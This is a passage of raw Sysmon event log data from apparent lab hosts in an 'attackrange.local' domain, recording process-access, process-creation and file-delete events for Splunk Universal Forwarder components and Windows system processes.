Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807014Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.950{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807013Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.950{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807012Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.950{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807011Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.950{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807010Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.950{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807009Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.950{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807008Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.950{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807007Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.934{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807006Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.934{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807005Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.934{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F404-60EB-5F79-00000000D001}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807004Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.934{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F404-60EB-5F79-00000000D001}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807003Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.935{0C1E0330-F404-60EB-5F79-00000000D001}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000807002Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F404-60EB-5E79-00000000D001}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807001Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807000Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806999Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806998Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806997Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806996Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806995Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806994Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806993Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806992Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F404-60EB-5E79-00000000D001}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806991Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F404-60EB-5E79-00000000D001}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806990Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.248{0C1E0330-F404-60EB-5E79-00000000D001}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806989Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.059{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF98D2E884EC8C2BF075B63B674797BE,SHA256=DA02E0E55A088C7000134D3311E5EC04C7BE78D5941AC4D17E064644E658DC81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:24.047{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 